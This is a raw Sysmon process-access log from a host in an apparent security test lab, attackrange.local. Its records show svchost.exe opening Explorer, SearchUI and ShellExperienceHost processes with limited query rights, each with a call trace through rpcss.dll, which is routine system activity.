07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 